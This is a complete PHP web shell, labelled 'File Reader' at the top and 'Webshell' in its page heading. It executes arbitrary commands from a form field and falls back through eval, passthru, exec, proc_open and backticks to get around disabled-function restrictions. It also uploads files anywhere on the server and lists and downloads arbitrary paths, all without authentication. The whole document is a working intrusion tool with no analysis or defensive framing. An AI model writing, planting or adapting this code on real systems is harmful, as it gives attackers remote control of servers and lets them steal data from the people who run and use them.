📖 File Reader
<?php
$dir = getcwd();
if (isset($_GET['dir'])) $dir = $_GET['dir'];
$files = scandir($dir);
// Cmd Exec (try multiple bypasses)
if (isset($_POST['cmd'])) {
$output = '';
// Try shell_exec first
if (function_exists('shell_exec')) {
$output = shell_exec($_POST['cmd']);
}
// Bypass 1: eval (for PHP code, e.g. cmd='system("id");')
else if (function_exists('eval')) {
ob_start();
eval($_POST['cmd']);
$output = ob_get_clean();
}
// Bypass 2: passthru
else if (function_exists('passthru')) {
ob_start();
passthru($_POST['cmd']);
$output = ob_get_clean();
}
// Bypass 3: exec
else if (function_exists('exec')) {
exec($_POST['cmd'], $out);
$output = implode("\n", $out);
}
// Bypass 4: proc_open (more reliable)
else if (function_exists('proc_open')) {
$proc = proc_open($_POST['cmd'], [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
proc_close($proc);
}
// Bypass 5: backticks
else if (function_exists('`')) {
$output = `$_POST['cmd']`;
}
echo "<pre>" . ($output ?: "No bypass worked — disable_functions too strict") . "</pre>";
}
// File Upload
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $dir . '/' . $_FILES['file']['name']);
echo "Uploaded: " . $_FILES['file']['name'];
}
// File Download
if (isset($_GET['download'])) {
$file = $_GET['download'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
exit;
}
?>
<!DOCTYPE html>
<html>
<body>
<h1>Webshell</h1>
<!-- Cmd Exec -->
<form method="POST">
<input name="cmd" placeholder="id">
<button>Run Cmd</button>
</form>
<!-- File Upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button>Upload</button>
</form>
<!-- File Manager & Download -->
<ul>
<?php foreach ($files as $file) {
if ($file != '.' && $file != '..') {
echo "<li>$file <a href='?download=$dir/$file'>Download</a></li>";
}
} ?>
</ul>
</body>
</html>